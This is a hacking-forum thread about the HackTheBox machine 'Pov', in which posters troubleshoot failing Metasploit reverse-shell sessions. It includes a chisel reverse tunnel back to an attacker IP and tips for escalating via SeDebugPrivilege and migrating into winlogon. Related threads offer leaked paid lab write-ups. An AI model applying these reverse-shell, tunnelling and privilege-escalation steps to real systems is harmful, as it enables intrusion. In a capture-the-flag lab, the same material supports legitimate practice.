Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
msf definitely helps a lot
Reply
guys , why my msf session closed immeditately

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LhoST tun0
LhoST => 10.10.14.37
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.37:4444
[-] Command shell session 1 is not valid and will be closed
[*] 10.10.11.251 - Command shell session 1 closed.
[-] Command shell session 2 is not valid and will be closed
[*] 10.10.11.251 - Command shell session 2 closed.
Reply
Hey all, I'm still stuck on root exploit. meterpeter payload does not seem to work properly.
Reply
hi guys i don't know why i am facing see this error

PS C:\Users\alaading\Documents> .\chisel.exe client 10.10.14.12:9000 R:5985:127.0.0.1:5985
.\chisel.exe client 10.10.14.12:9000 R:5985:127.0.0.1:5985
2024/01/31 03:57:14 client: Connecting to ws://10.10.14.12:9000
2024/01/31 03:57:16 client: Connected (Latency 428.9636ms)
2024/01/31 03:57:44 client: Disconnected
2024/01/31 03:57:44 client: Connection error: read tcp 10.129.227.120:49738->10.10.14.12:9000: wsarecv: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
2024/01/31 03:57:44 client: Retrying in 100ms...
2024/01/31 03:57:47 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 1/unlimited)
2024/01/31 03:57:47 client: Retrying in 200ms...
2024/01/31 03:57:50 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 2/unlimited)
2024/01/31 03:57:50 client: Retrying in 400ms...
2024/01/31 03:57:53 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 3/unlimited)
2024/01/31 03:57:53 client: Retrying in 800ms...
2024/01/31 03:57:57 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 4/unlimited)
2024/01/31 03:57:57 client: Retrying in 1.6s...
2024/01/31 03:58:00 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 5/unlimited)
2024/01/31 03:58:00 client: Retrying in 3.2s...
2024/01/31 03:58:06 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 6/unlimited)
2024/01/31 03:58:06 client: Retrying in 6.4s...
2024/01/31 03:58:14 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 7/unlimited)
2024/01/31 03:58:14 client: Retrying in 12.8s...
2024/01/31 03:58:30 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 8/unlimited)
2024/01/31 03:58:30 client: Retrying in 25.6s...
2024/01/31 03:58:57 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 9/unlimited)
2024/01/31 03:58:57 client: Retrying in 51.2s...
2024/01/31 03:59:51 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 10/unlimited)
2024/01/31 03:59:51 client: Retrying in 1m42.4s...
2024/01/31 04:01:35 client: Connection error: server: Server cannot listen on R:5985=>5985 (Attempt: 11/unlimited)
2024/01/31 04:01:35 client: Retrying in 3m24.8s...

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Scraping | Contact us via https://breachforums.ai/contact if you feel this is incorrect.
Reply
Eventually I fixed it. Thanks for responding though
Reply
Can someone help me?
*] 10.10.11.251 - Meterpreter session 2 closed. Reason: Died
[*] 10.10.11.251 - Meterpreter session 3 closed. Reason: Died
[*] 10.10.11.251 - Meterpreter session 4 closed. Reason: Died
Reply
pov video walkthrough https://youtu.be/p3mfmeTw64Q?si=6nE-MjTkGPOVcG99

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
(Feb 02, 2024, 09:23 PM)OliveiraaX Wrote: Can someone help me?
*] 10.10.11.251 - Meterpreter session 2 closed. Reason: Died
[*]10.10.11.251 - Meterpreter session 3 closed. Reason: Died
[*]10.10.11.251 - Meterpreter session 4 closed. Reason: Died

I had the same issue, try to run the exploit in powershell and in format "start .\exploit.exe", this worked for me.
Reply
I couldn't get over the fact that I needed to use msfvenom and so I wrote a working utility that you can use after receiving SeDebugpriv, check it out Rolleyes  
https://github.com/foxmiti/foxhole/tree/main
Reply
(Jan 31, 2024, 05:24 PM)hofu Wrote:
(Jan 30, 2024, 04:42 PM)MurphyWhite Wrote: guys , why my msf session closed immeditately

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LhoST tun0
LhoST => 10.10.14.37
msf6 exploit(multi/handler) > run

[*]Started reverse TCP handler on 10.10.14.37:4444
[-] Command shell session 1 is not valid and will be closed
[*]10.10.11.251 - Command shell session 1 closed.
[-] Command shell session 2 is not valid and will be closed
[*]10.10.11.251 - Command shell session 2 closed.


maybe wrong payload of the handler? set it to the same as you have used for mfsvenom

(Jan 30, 2024, 05:42 PM)bokkoe Wrote: Hey all, I'm still stuck on root exploit. meterpeter payload does not seem to work properly.

meterpreter payload? The trick is to enable sedebugprivilege afterwards you can migrate to winlogon

Yes, you are right. I set the wrong payload of handler.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,927 5 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,528 5 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,796 6 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,610 10 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)